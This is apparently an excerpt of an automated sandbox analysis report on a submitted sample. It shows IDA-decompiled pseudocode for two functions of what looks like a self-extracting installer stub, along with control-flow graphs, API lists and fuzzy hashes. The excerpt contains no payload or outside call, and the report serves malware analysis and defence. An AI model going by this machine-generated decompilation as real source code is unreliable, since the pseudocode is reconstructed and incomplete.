                                                                                                                                                                                                                                      control_flow_graph 324 402ca1-402d13 memset * 3 call 404669 327 402d19-402d1e 324->327 328 402eea 324->328 327->328 330 402d24-402d50 CreateEventA SetEvent call 404669 327->330 329 402eef-402ef8 call 404495 328->329 334 402efd 329->334 335 402d52-402d6f call 404495 330->335 336 402d74-402d7b 330->336 337 402eff-402f0d call 406c80 334->337 335->334 339 402d81-402d98 call 404669 336->339 340 402e16-402e25 call 405c50 336->340 339->335 350 402d9a-402db2 CreateMutexA 339->350 348 402e31-402e38 340->348 349 402e27-402e2c 340->349 351 402e49-402e59 FindResourceA 348->351 352 402e3a-402e44 call 402395 348->352 349->329 350->340 353 402db4-402dbf GetLastError 350->353 356 402e65-402e6c 351->356 357 402e5b-402e63 LoadResource 351->357 352->334 353->340 355 402dc1-402dca 353->355 359 402de1-402df9 call 404495 355->359 360 402dcc-402ddf call 404495 355->360 361 402e74-402e7b 356->361 362 402e6e 356->362 357->356 359->340 370 402dfb-402e11 CloseHandle 359->370 360->370 363 402e82-402e8b call 4036dc 361->363 364 402e7d-402e80 361->364 362->361 363->334 372 402e8d-402e99 363->372 364->337 370->334 373 402ea7-402eb1 372->373 374 402e9b-402e9f 372->374 376 402eb3-402eba 373->376 377 402ee6-402ee8 373->377 374->373 375 402ea1-402ea5 374->375 375->373 375->377 376->377 378 402ebc-402ec3 call 4018c1 376->378 377->337 378->377 381 402ec5-402ee4 call 4064c3 378->381 381->334 381->377
                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                      			E00402CA1(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t13 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                                                      				 *0x409a3c = __ecx;
                                                                                                                                                                                                                                      				memset(0x409140, 0, 0x8fc);
                                                                                                                                                                                                                                      				memset(0x408a20, 0, 0x32c);
                                                                                                                                                                                                                                      				memset(0x4088c0, 0, 0x104);
                                                                                                                                                                                                                                      				 *0x4093ec = 1;
                                                                                                                                                                                                                                      				_t20 = E00404669("TITLE", 0x409154, 0x7f);
                                                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                      					 *0x40858c = _t27;
                                                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                                                      					_t64 = 0x409a34;
                                                                                                                                                                                                                                      					if(E00404669("EXTRACTOPT", 0x409a34, 4) != 0) {
                                                                                                                                                                                                                                      						if(( *0x409a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                                                      							 *0x409120 =  *0x409120 & _t65;
                                                                                                                                                                                                                                      							if(E00405C50(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                      								if( *0x408a3a == 0) {
                                                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa); // executed
                                                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									if( *0x408184 != 0) {
                                                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									if( *0x408a24 == 0) {
                                                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                                                      										if(E004036DC(_t65) == 0) {
                                                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											_t33 =  *0x409a40; // 0x3
                                                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                      												if(( *0x409a34 & 0x00000100) == 0 || ( *0x408a38 & 0x00000001) != 0 || E004018C1(_t64, _t66) != 0) {
                                                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                                                      													if(E004064C3(_t57, 0x7d6, _t34, E00401A00, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									E00402395(0x408a3a);
                                                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                                                      								E00404495(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                                                      							if(E00404669("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                      								 *0x408588 = _t43;
                                                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									if(( *0x409a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                                                      										if(E00404495(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                                                      										E00404495(0, 0x54b, "OxZQ", 0, 0x10, 0);
                                                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                                                      										CloseHandle( *0x408588);
                                                                                                                                                                                                                                      										 *0x409124 = 0x800700b7;
                                                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                                                      						E00404495(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                      			}



















                                                                                                                                                                                                                                      0x00402cac
                                                                                                                                                                                                                                      0x00402cb3
                                                                                                                                                                                                                                      0x00402cbe
                                                                                                                                                                                                                                      0x00402cc0
                                                                                                                                                                                                                                      0x00402cc8
                                                                                                                                                                                                                                      0x00402cca
                                                                                                                                                                                                                                      0x00402cd0
                                                                                                                                                                                                                                      0x00402ce0
                                                                                                                                                                                                                                      0x00402cf0
                                                                                                                                                                                                                                      0x00402d05
                                                                                                                                                                                                                                      0x00402d0c
                                                                                                                                                                                                                                      0x00402d13
                                                                                                                                                                                                                                      0x00402eea
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402d24
                                                                                                                                                                                                                                      0x00402d2b
                                                                                                                                                                                                                                      0x00402d32
                                                                                                                                                                                                                                      0x00402d37
                                                                                                                                                                                                                                      0x00402d3f
                                                                                                                                                                                                                                      0x00402d50
                                                                                                                                                                                                                                      0x00402d7b
                                                                                                                                                                                                                                      0x00402e16
                                                                                                                                                                                                                                      0x00402e16
                                                                                                                                                                                                                                      0x00402e25
                                                                                                                                                                                                                                      0x00402e38
                                                                                                                                                                                                                                      0x00402e51
                                                                                                                                                                                                                                      0x00402e59
                                                                                                                                                                                                                                      0x00402e63
                                                                                                                                                                                                                                      0x00402e63
                                                                                                                                                                                                                                      0x00402e6c
                                                                                                                                                                                                                                      0x00402e6e
                                                                                                                                                                                                                                      0x00402e6e
                                                                                                                                                                                                                                      0x00402e7b
                                                                                                                                                                                                                                      0x00402e82
                                                                                                                                                                                                                                      0x00402e8b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402e8d
                                                                                                                                                                                                                                      0x00402e8d
                                                                                                                                                                                                                                      0x00402e95
                                                                                                                                                                                                                                      0x00402e99
                                                                                                                                                                                                                                      0x00402eb1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402ec5
                                                                                                                                                                                                                                      0x00402ed5
                                                                                                                                                                                                                                      0x00402ee4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402ee4
                                                                                                                                                                                                                                      0x00402ee6
                                                                                                                                                                                                                                      0x00402ee6
                                                                                                                                                                                                                                      0x00402ee6
                                                                                                                                                                                                                                      0x00402ee6
                                                                                                                                                                                                                                      0x00402e99
                                                                                                                                                                                                                                      0x00402e7d
                                                                                                                                                                                                                                      0x00402e7f
                                                                                                                                                                                                                                      0x00402e7f
                                                                                                                                                                                                                                      0x00402e3a
                                                                                                                                                                                                                                      0x00402e3f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402e3f
                                                                                                                                                                                                                                      0x00402e27
                                                                                                                                                                                                                                      0x00402e27
                                                                                                                                                                                                                                      0x00402eef
                                                                                                                                                                                                                                      0x00402ef8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402ef8
                                                                                                                                                                                                                                      0x00402d81
                                                                                                                                                                                                                                      0x00402d86
                                                                                                                                                                                                                                      0x00402d98
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402d9a
                                                                                                                                                                                                                                      0x00402da5
                                                                                                                                                                                                                                      0x00402dab
                                                                                                                                                                                                                                      0x00402db2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402dc1
                                                                                                                                                                                                                                      0x00402dca
                                                                                                                                                                                                                                      0x00402dec
                                                                                                                                                                                                                                      0x00402df9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402dcc
                                                                                                                                                                                                                                      0x00402dd5
                                                                                                                                                                                                                                      0x00402dda
                                                                                                                                                                                                                                      0x00402dfb
                                                                                                                                                                                                                                      0x00402e01
                                                                                                                                                                                                                                      0x00402e07
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402e07
                                                                                                                                                                                                                                      0x00402dca
                                                                                                                                                                                                                                      0x00402db2
                                                                                                                                                                                                                                      0x00402d98
                                                                                                                                                                                                                                      0x00402d52
                                                                                                                                                                                                                                      0x00402d52
                                                                                                                                                                                                                                      0x00402d54
                                                                                                                                                                                                                                      0x00402d60
                                                                                                                                                                                                                                      0x00402d65
                                                                                                                                                                                                                                      0x00402efd
                                                                                                                                                                                                                                      0x00402efd
                                                                                                                                                                                                                                      0x00402efd
                                                                                                                                                                                                                                      0x00402d50
                                                                                                                                                                                                                                      0x00402f0d

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CD0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CF0
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D2B
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D37
                                                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DA5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00402DB4
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(OxZQ,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E01
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$OxZQ$TITLE$VERCHECK
                                                                                                                                                                                                                                      • API String ID: 1002816675-213980911
                                                                                                                                                                                                                                      • Opcode ID: 262577620840b9fbceb263c8f89c1c6b1ff5499c820fb93cdd5c9ce910e3b2f6
                                                                                                                                                                                                                                      • Instruction ID: 56d7e3f2f12efa8603a32b80951722451b1f38ed6383cdbcd7478795a340d109
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 262577620840b9fbceb263c8f89c1c6b1ff5499c820fb93cdd5c9ce910e3b2f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5051A670780341AAE750AB25CF4DB7B2699DB85704F10443FBA81F56E1DBFC8C419A5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 384 4034e0-4034ee 385 403653-403655 384->385 386 4034f4-4034fc 384->386 389 403656-403658 385->389 387 403502-403505 386->387 388 40364b-40364f 386->388 390 40350b-40350d 387->390 391 4035ae-4035ce GetDesktopWindow call 4043ae 387->391 392 403651 388->392 393 403667 388->393 394 40365e 389->394 396 40353f-403543 390->396 397 40350f-403514 390->397 404 4035d0-403607 GetDlgItem SendMessageA GetDlgItem SendMessageA 391->404 405 40360d-403634 SetWindowTextA CreateThread 391->405 392->389 399 403669-40366d 393->399 398 403661 EndDialog 394->398 396->393 403 403549-403574 ResetEvent call 404495 396->403 401 403516-403518 397->401 402 40351d-40353a TerminateThread KiUserCallbackDispatcher 397->402 398->393 401->399 402->399 410 403576-403578 403->410 411 40358b-4035a9 SetEvent call 403670 403->411 404->405 405->393 407 403636-403649 call 404495 405->407 407->398 410->411 413 40357a-403586 SetEvent 410->413 411->394 413->393
                                                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                                                      			E004034E0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                                                      					 *0x4091d8 = 1;
                                                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                                                      					 *0x408584 = _t35;
                                                                                                                                                                                                                                      					E004043AE(_t35, GetDesktopWindow()); // executed
                                                                                                                                                                                                                                      					__eflags =  *0x408184; // 0x1
                                                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9); // executed
                                                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000); // executed
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					SetWindowTextA(_t35, "OxZQ"); // executed
                                                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E00404FA0, 0, 0, 0x408798); // executed
                                                                                                                                                                                                                                      					 *0x40879c = _t17;
                                                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						E00404495(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					ResetEvent( *0x40858c);
                                                                                                                                                                                                                                      					_t38 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      					_t25 = E00404495(_t38, 0x4b2, 0x401140, 0, 0x20, 4);
                                                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                                                      						 *0x4091d8 = 1;
                                                                                                                                                                                                                                      						SetEvent( *0x40858c);
                                                                                                                                                                                                                                      						_t39 =  *0x40879c; // 0x298
                                                                                                                                                                                                                                      						E00403670(_t39);
                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					SetEvent( *0x40858c);
                                                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                      					TerminateThread( *0x40879c, 0); // executed
                                                                                                                                                                                                                                      					EndDialog(_a4, _a12); // executed
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}












                                                                                                                                                                                                                                      0x004034eb
                                                                                                                                                                                                                                      0x004034ee
                                                                                                                                                                                                                                      0x00403655
                                                                                                                                                                                                                                      0x00403656
                                                                                                                                                                                                                                      0x00403656
                                                                                                                                                                                                                                      0x00403658
                                                                                                                                                                                                                                      0x0040365e
                                                                                                                                                                                                                                      0x0040365e
                                                                                                                                                                                                                                      0x00403661
                                                                                                                                                                                                                                      0x00403661
                                                                                                                                                                                                                                      0x00403667
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403667
                                                                                                                                                                                                                                      0x004034f4
                                                                                                                                                                                                                                      0x004034f6
                                                                                                                                                                                                                                      0x004034f7
                                                                                                                                                                                                                                      0x004034fc
                                                                                                                                                                                                                                      0x0040364b
                                                                                                                                                                                                                                      0x0040364f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403651
                                                                                                                                                                                                                                      0x00403502
                                                                                                                                                                                                                                      0x00403505
                                                                                                                                                                                                                                      0x004035ae
                                                                                                                                                                                                                                      0x004035b1
                                                                                                                                                                                                                                      0x004035c1
                                                                                                                                                                                                                                      0x004035c8
                                                                                                                                                                                                                                      0x004035ce
                                                                                                                                                                                                                                      0x004035e8
                                                                                                                                                                                                                                      0x00403607
                                                                                                                                                                                                                                      0x00403607
                                                                                                                                                                                                                                      0x00403613
                                                                                                                                                                                                                                      0x00403627
                                                                                                                                                                                                                                      0x0040362d
                                                                                                                                                                                                                                      0x00403632
                                                                                                                                                                                                                                      0x00403634
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403636
                                                                                                                                                                                                                                      0x00403642
                                                                                                                                                                                                                                      0x00403647
                                                                                                                                                                                                                                      0x00403648
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403648
                                                                                                                                                                                                                                      0x00403634
                                                                                                                                                                                                                                      0x0040350b
                                                                                                                                                                                                                                      0x0040350d
                                                                                                                                                                                                                                      0x0040353f
                                                                                                                                                                                                                                      0x00403543
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040354f
                                                                                                                                                                                                                                      0x00403555
                                                                                                                                                                                                                                      0x0040356c
                                                                                                                                                                                                                                      0x00403571
                                                                                                                                                                                                                                      0x00403574
                                                                                                                                                                                                                                      0x0040358b
                                                                                                                                                                                                                                      0x00403591
                                                                                                                                                                                                                                      0x00403597
                                                                                                                                                                                                                                      0x0040359d
                                                                                                                                                                                                                                      0x004035a3
                                                                                                                                                                                                                                      0x004035a8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004035a8
                                                                                                                                                                                                                                      0x00403576
                                                                                                                                                                                                                                      0x00403578
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403580
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403580
                                                                                                                                                                                                                                      0x00403514
                                                                                                                                                                                                                                      0x00403525
                                                                                                                                                                                                                                      0x00403531
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403539
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • TerminateThread.KERNELBASE(00000000), ref: 00403525
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403531
                                                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 0040354F
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(00401140,00000000,00000020,00000004), ref: 00403580
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004035B7
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 004035E1
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 004035E8
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00403600
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00403607
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,OxZQ), ref: 00403613
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004FA0,00000000,00000000,00408798), ref: 00403627
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00403661
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EventItemMessageSendThreadWindow$CallbackCreateDesktopDialogDispatcherResetTerminateTextUser
                                                                                                                                                                                                                                      • String ID: OxZQ
                                                                                                                                                                                                                                      • API String ID: 1381227109-3840506403
                                                                                                                                                                                                                                      • Opcode ID: 19c21116c90dad6c1fc55e71bb66732fcc3db7f85ba87d416eced69185a785fc
                                                                                                                                                                                                                                      • Instruction ID: 215726270629dfb2dbcd9a4a484552926b79df19a6359068b30bbda6550c742f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19c21116c90dad6c1fc55e71bb66732fcc3db7f85ba87d416eced69185a785fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED319571240301BBD7205F25EE0DE273E2CE785B42F24483EF641B93E1CA7A8911DA5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

